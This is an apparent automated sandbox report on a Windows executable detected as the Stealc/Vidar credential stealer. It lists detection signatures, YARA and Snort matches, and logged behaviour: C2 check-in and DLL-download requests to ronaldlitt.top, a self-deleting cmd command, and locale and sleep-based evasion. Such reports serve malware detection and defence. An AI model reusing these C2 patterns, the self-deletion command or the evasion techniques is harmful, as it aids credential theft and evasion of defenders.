Edit tour

Windows Analysis Report
un78exGoa4.exe

Overview

General Information

Sample Name:	un78exGoa4.exe
Original Sample Name:	84f304e30439cf1f837ed4f31c1fbb28.exe
Analysis ID:	876992
MD5:	84f304e30439cf1f837ed4f31c1fbb28
SHA1:	257518ece774da6ba53ca070121a206519f0c229
SHA256:	cb7f4e286a4a8fdfa525168591131d37019090d94040feb13c8078c4a7ae4b37
Tags:	exeStealc
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Stealc

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Tries to steal Crypto Currency Wallets

Self deletion via cmd or bat file

Machine Learning detection for sample

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

un78exGoa4.exe (PID: 7132 cmdline: C:\Users\user\Desktop\un78exGoa4.exe MD5: 84F304E30439CF1F837ED4F31C1FBB28)

cmd.exe (PID: 6808 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 7112 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.421505626.0000000002410000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.421165078.00000000006D9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5af9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.421176016.0000000000734000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: un78exGoa4.exe PID: 7132	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: un78exGoa4.exe PID: 7132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: un78exGoa4.exe PID: 7132	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.un78exGoa4.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Snort Signatures

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.5 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.58.8.8.865323532023883 05/28/23-09:29:39.799894
SID:	2023883
Source Port:	65323
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 193.106.175.215

Timestamp:	192.168.2.5193.106.175.21549712802044244 05/28/23-09:29:40.725978
SID:	2044244
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 193.106.175.215

Timestamp:	192.168.2.5193.106.175.21549713802044246 05/28/23-09:29:40.856625
SID:	2044246
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 193.106.175.215

Timestamp:	192.168.2.5193.106.175.21549711802044243 05/28/23-09:29:40.524393
SID:	2044243
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 07:29:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0

Source: un78exGoa4.exe, 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ronaldlitt.top
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.421176016.00000000006EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ronaldlitt.top/25d4fc7fb0cb6b78.php
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ronaldlitt.top/25d4fc7fb0cb6b78.php89c6ee431893fde88e49579e17ef5
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ronaldlitt.top/25d4fc7fb0cb6b78.phption:
Source: un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll5
Source: un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dllY
Source: un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.428729273.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FCFIJEBF.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FCFIJEBF.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FCFIJEBF.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FCFIJEBF.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /25d4fc7fb0cb6b78.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBHost: ronaldlitt.topContent-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 31 45 39 33 31 43 32 43 41 32 37 30 32 36 31 31 38 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="hwid"4911E931C2CA2702611826------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build"default------BAEBGCFIEHCFIDGCAAFB--

Source: unknown

DNS traffic detected: queries for: ronaldlitt.top

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040397F InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_0040397F

Source: global traffic

HTTP traffic detected: GET /3abdf8b5527012d0/sqlite3.dll HTTP/1.1Host: ronaldlitt.topCache-Control: no-cache

Source: un78exGoa4.exe, 00000000.00000002.421132542.00000000006CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.421505626.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.421165078.00000000006D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: un78exGoa4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.421505626.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.421165078.00000000006D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: String function: 00403893 appears 335 times

Source: un78exGoa4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: un78exGoa4.exe	ReversingLabs: Detection: 48%
Source: un78exGoa4.exe	Virustotal: Detection: 38%

Source: un78exGoa4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\un78exGoa4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\un78exGoa4.exe C:\Users\user\Desktop\un78exGoa4.exe
Source: C:\Users\user\Desktop\un78exGoa4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\un78exGoa4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/19@1/1

Source: C:\Users\user\Desktop\un78exGoa4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: un78exGoa4.exe, 00000000.00000003.390987396.000000000255B000.00000004.00000020.00020000.00000000.sdmp, HDHCGHDHIDHCBGCBGCAE.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: un78exGoa4.exe, 00000000.00000002.428676350.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040ED7B CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_0040ED7B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_01

Source: C:\Users\user\Desktop\un78exGoa4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: un78exGoa4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: un78exGoa4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ,;C:\rucakos\39\xitifeco60\ridetijiyekav8.pdb source: un78exGoa4.exe
Source:	Binary string: C:\rucakos\39\xitifeco60\ridetijiyekav8.pdb source: un78exGoa4.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\un78exGoa4.exe

Unpacked PE file: 0.2.un78exGoa4.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\un78exGoa4.exe

Unpacked PE file: 0.2.un78exGoa4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040F49D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040F49D

Source: initial sample

Static PE information: section name: .text entropy: 7.580309216292186

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\un78exGoa4.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Users\user\Desktop\un78exGoa4.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

0_2_0040F49D

Source: C:\Users\user\Desktop\un78exGoa4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\un78exGoa4.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-6911

Source: C:\Windows\SysWOW64\timeout.exe TID: 4444

Thread sleep count: 31 > 30

Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-8805

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040E91A GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040E9FAh

0_2_0040E91A

Source: C:\Users\user\Desktop\un78exGoa4.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\un78exGoa4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_00409C83 GetProcessHeap,RtlAllocateHeap,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentProcess,IsWow64Process,GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,GetUserDefaultLocaleName,LocalAlloc,CharToOemW,GetSystemPowerStatus,DwmGetDxRgn,GetCurrentProcessId,OpenProcess,K32GetModuleFileNameExA,CloseHandle,GetProcessHeap,RtlAllocateHeap,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,GetProcessHeap,RtlAllocateHeap,GlobalMemoryStatusEx,wsprintfA,GetProcessHeap,RtlAllocateHeap,wsprintfA,lstrlen,

0_2_00409C83

